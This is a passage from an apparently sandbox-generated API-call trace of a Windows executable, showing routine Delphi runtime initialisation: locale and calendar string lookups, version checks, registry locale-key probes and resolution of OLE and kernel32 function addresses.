lpBuffer="Disk full") returned 0x9 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0093.941] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, 
dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.941] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.941] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.941] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13280dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0093.941] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0093.941] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.941] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.941] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 
0x2 [0093.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.942] GetThreadLocale () returned 0x409 [0093.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0093.942] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.942] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.942] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.942] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.942] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1c4310 [0093.942] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.942] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0093.942] GetLastError () returned 0x7a [0093.942] GetLogicalProcessorInformation (in: Buffer=0x13199d0, ReturnedLength=0x12fab0 | out: Buffer=0x13199d0, ReturnedLength=0x12fab0) returned 1 [0093.942] GetCurrentThreadId () returned 0xaf0 [0093.942] GetCurrentThreadId () returned 0xaf0 [0093.942] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0093.943] GetThreadLocale () returned 0x409 [0093.943] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.943] GetThreadLocale () returned 0x409 [0093.943] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.943] GetCurrentThreadId () returned 0xaf0 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, 
lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0093.943] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0093.944] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, 
lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.944] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0093.944] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0093.944] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0093.944] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0093.946] GetProcAddress 
(hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0093.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0093.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0093.946] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0093.946] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15073568958) returned 1 [0093.946] GetTickCount () returned 0x22c7c [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: 
lpPerformanceCount=0x12fc28*=15073583188) returned 1 [0093.947] GetTickCount () returned 0x22c7c [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13282bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x131288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13282bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13282bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13282bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 21 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13282bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0093.947] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x132f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0093.947] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13282bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0093.948] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x132f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0093.948] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x132f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0093.948] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0093.948] GetThreadLocale () returned 0x409 [0093.948] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.948] GetCurrentThreadId () returned 0xaf0 [0093.948] GetCurrentThreadId () returned 0xaf0 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0093.948] GetThreadLocale () returned 0x409 [0093.948] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.948] GetThreadLocale () returned 0x409 [0093.948] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.948] GetCurrentThreadId () returned 0xaf0 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0093.948] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0093.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, 